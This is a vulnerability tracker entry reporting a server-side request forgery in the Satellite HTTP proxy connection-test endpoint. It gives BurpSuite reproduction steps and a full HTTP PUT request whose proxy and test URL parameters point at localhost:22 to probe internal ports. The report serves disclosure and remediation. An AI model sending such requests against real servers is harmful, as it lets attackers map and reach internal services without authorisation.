Bug 2333494 - http proxies: Satellite: Service side request forgery in http proxies
Summary: http proxies: Satellite: Service side request forgery in http proxies
Keywords:
Status: NEW
Alias: None
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On:
Blocks:
TreeView+ depends on / blocked
 
Reported: 2024-12-20 12:24 UTC by OSIDB Bzimport
Modified: 2025-05-12 20:30 UTC (History)
11 users (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2024-12-20 12:24:51 UTC
ssrf in https://vulnerableserver.com/http_proxies/test_connection
Affected parameters:
http_proxy[url]
test_ur

• Fill the values and Capture the request with BurpSuite
• In the Repeater tab change the parameter values http_proxy[url] and/or test_url for: http://localhost:22
By default the SSH (22) port is not open:
HTTP Request:
PUT /http_proxies/test_connection HTTP/2
Host: vulnerableserver.com
Cookie: timezone=Europe%2FAmsterdam; _session_id=70c6c0638ec6aad4bd733570fd807267
Content-Length: 381
Sec-Ch-Ua-Platform: "Windows"
X-Csrf-Token: DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g
Accept-Language: en-GB,en;q=0.9
Sec-Ch-Ua: "Chromium";v="129", "Not=A?Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71
Safari/537.36
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://vulnerableserver.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://vulnerableserver.com/http_proxies/new
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
authenticity_token=DQmNtiYbhAdFABfamR7mZy7WhruFtY2jjAWrtRPGu5PqmaJwrsCB9Y7hqQZmsCaqNv1VN2aDsxeBBSsgpA478g&http_proxy%5B
name%5D=test&http_proxy%5Burl%5D=http://localhost:22&http_proxy%5Busername%5D=&fakepassword=&http_proxy%5Bcacert%5D=&te
st_url=http://localhost:22&http_proxy%5Blocation_ids%5D%5B%5D=&http_proxy%5Borganization_ids%5D%5B%5D=&http_proxy%5Borg
anization_ids%5D%5B%5D=1


Note You need to log in before you can comment on or make changes to this bug.